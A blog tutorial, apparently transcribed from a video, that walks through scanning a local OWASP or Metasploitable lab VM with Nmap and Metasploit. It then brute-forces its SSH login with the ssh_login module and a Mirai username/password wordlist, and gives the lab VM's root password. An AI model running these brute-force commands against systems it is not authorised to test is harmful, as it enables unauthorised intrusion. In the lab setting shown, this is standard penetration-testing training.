 Bruteforcing SSH login with Metasploit Auxiliary


right now what we want to do is basically just start with some of the auxiliary modules that are in the Metasploit framework. So we want to basically scan the machine with msfconsole. Now let us, first of all, start the MSF console. Now if you did start the Postgresql before this started, so this can run faster. 

But while this is starting I also want to start my OWASP virtual machine. whether it is Metasploitable one or Metasploitable two, you can also run that one as well.

I am using OWASP. I will show you some of the attacks you can perform on owasp broken web application. But some of the attacks are also similar for OWASP and for the Metasploitable. So just start any of those two machines.as we remember this is a virtual machine. It will prompt us with entering our user name and password, which is the user name is a root and the password is owaspbwa. 

We get the standard command-line tool. Let us just first check the IP address of this so we know it. So the IP address of our OWASP virtual machine is 192.168.56.101.you can run a bunch of different commands, or basically all the commands we run from our regular terminal you can also run from the Metasploit framework command line. 

First what we want to do is let's first take a good scan of the OWASP virtual machine. Now we covered Nmap before, so what we want to do right now is 
Nmap -sV 192.168.56.101
so we can get the version from the services running on certain ports, and then we specify the IP address of our OWASP virtual machine. Or in your case, if you're using Metasploitable, of your Metasploitable machine. To execute this. And now we wait for this to finish. It should prompt us with all of the open ports. 


Metasploit framework Nmap


It should prompt us with the services running on the open ports. And it should prompt us with the version of those services running, which can be useful especially when you use the Metasploit framework. So what we will do is we will try some of the certain attacks on this. Now we can see that the scan has finished in 33.9 seconds. 
So we get the open ports, and let's start off with the SSH port. Now here are a bunch of these other ports such as 139 and 445 running Samba smbd versions 3 to 4, which is also a vulnerable software. You also have it on Metasploitable, I believe, the same version. I will show you how you can exploit it later on. But for now, let us start off by trying to get in over the SSH. 

So we can see that the service running is  SSH on Port 22, and the version is OpenSSH 5.3p1 Debian 3ubuntu4. So what we will do is we will use the auxiliary module that is in the Metasploit framework, and we will try to brute force the SSH on Port 22 from our OWASP virtual machine. Or if you're running Metasploitable, once again, from your Metasploitable the process is the same. So let us try with searching SSH. 

search auxiliary/scanner


Metasploit framework auxiliary SSH


Now this will print us all of the available exploits auxiliary modules, post exploit modules for the SSH. What we are searching for is a scanner, and the scanner has to be the login. So here it is
auxiliary/scanner/ssh/ssh_login.
 Now it does not have the date when it came out and is it is ranked as normal, and it says the SSH login check scanner. Which basically means the SSH bruteforcer. Now you can also, for example, check the SSH version before you start that. So auxiliary scanner SSH version, SSH version scanner, 

let's, first of all, start with that one. I believe it will give us the same thing that the Nmap gave us, which is the version of the SSH. Now you can use this instead of Nmap since sometimes Nmap won't give you the version, and I believe this one is actually more detailed. 

So as we saw in the previous article, in order to pick any of these, you just type use and then the name of the module itself.  And what we want to do is show our available options. So we can see that we have four different options and they are all required. Most of them are already selected for us. So the RPORT, for example, is selected as 22 which is good. SSH is most likely always, and also by default, is running on Port 22. If it is not you would want to change this. 

Thread is the number of threads basically running during this process. Now the more threads, the faster this process will go. So depending on the power of the virtual machine you can select, for example, Now we also covered the set command, so you set basically all of these options with just set command, and then the name of the option you want, and then the number.

Metasploit framework SSH version

The only thing that we need to select right now is the RHOSTS. So the RHOSTS is basically the target address for our OWASP virtual machine. It is basically an IP address of your target. So set RHOSTS, we know it is 192.168.56.101, and now if we show our options again in order to check if everything is good, we will be able to run this. Now if you just run this, so just type in run, this will probably... here it is. This will print out the SSH version that it is running on the target software, or on target port 22. As we can see, SSH version this one, and it gives a bunch of other options as well that could be potentially useful to you. 



Now, this is a simple scan that we did for the first one, but now let's actually try to brute force this SSH on Port 22. So let us go to our available auxiliary modules, and what we want to use is the SSH to log in one. So just select the 
auxiliary/scanner/ssh/ssh_login
  copy, paste it, and then we can see that it changed the module., and let's show our options. Now you can see unlike the last one, this one has a lot of different options that we need to specify.

Metasploit framework SSH login option


Now some of them are required and some of them are not. 
For example, BLANK_PASSWORDS are not required. The next things we need, these are all not required. 
Password to authenticate with, no. Well basically you would use this if you already knew the password side, you see the point of this option right here. 
What we do want is the RHOSTS, the same as in the previous scan. So just type your set RHOSTS and then the IP address of our target machine. So 192.168.56.101,. 
And also what you would want to set, basically let's set threads to be 3 So 
set THREADS 3
 RPORT is correct and it is 22, 
stop on success false, stop guessing when a credential works for a host. So you want to set this to true since there is no real point in continuing the brute force, unless you want to on multiple accounts after you find hosts that actually work. So on credentials that are useful. So we type in 
set STOP_ON_SUCCESS true
 so you can just press tab in order for it to fill the rest of the name, and you can set this from false to true. And we can see that stop on success is now set to true for both. 
You also want to set to true so you can see all of the attempts that they're running. Now you do not need to, basically, I always set it to true so I can see the attempts of a brute force that we covered already. 
we should have all of our options set and ready to go. Now I believe there is something else we need to use which is the password list since this doesn't have a password list pre-specified I believe. 
So what we want to use is basically...let us try to find our simple password list. So let's open up a second terminal. So new window, and we know that there are some passwords in the usr/share/wordlists. 
we won't use like the rockyou.txt. It would take forever. These large passwords are most likely the best choice for the Wi-Fi cracking. For the brute-forcing, it's really not that good of a choice since it's not as fast as the Wi-Fi cracking. It's not nearly as fast. 
If you dont have these wordlists in /usr/share folder then simply get them by using cammand

apt install wordlists

So what we want to do is go to the Metasploit, type here ls, and we will see some of the password lists that are in Metasploit. 
So we do not need to really crack the SSH, we just need to show you the process of cracking it, and we will choose any password list we want. So let's say we choose this one, 
mirai_user_pass.txt 
 Now what that means, I believe, is that it also has both user and password. Yeah, it has both user and password separated with the space. So we will use that and we will see the available option for that right here, which would be the user pass file. So file containing users and password separated by a space, one pair per line, which is exactly what we selected. 
So we need to set this option right here. So let us set that option. 
set USERPASS_FILE 
and then we specify the path to the word list. So it was 
usr/share/wordlists/metasploit and then mirai_ user_ pass.txt
 So we set the path to our brute force list, or basically password and user name list. And now if we show options once again, I believe now now we should really be good to go. 

Metasploit framework SSH login option


So let us run this. We press here run and it should start brute forcing the SSH on port 22. As we can see it is starting different types of the usernames and passwords. It is going by that list that we specified. So these are all failed ones. And if it reaches one that actually exists it will stop and it'll prompt us with a success. So here we can see root:admin, admin:admin, root:root, and some of the other passwords.


Metasploit framework SSH login bruteforce



Metasploit framework SSH login


I just wanted to show you some of the different types of SSH auxiliary modules that you can use. So we saw how we can actually scan the version of SSH. We also saw how we can brute force the SSH. Now you can actually try this both on Metasploitable and on the OWASP machine. I'm not really sure if this password list has a username and password for those machines, so I added them in the list to show you how it works. 

So now you can use any password list you want and actually hope that you will brute force the SSH. So, that would be it for this tutorial. In the next tutorial,, we will cover another auxiliary module that we will use to attack another service running on our OWASP virtual machine. So that'll be it for this tutorial, and I hope I see you in the next one.

Happy Hacking..
Share:

Popular Posts

Loved Our Blog Posts? Subscribe To Get Updates Directly To Your Inbox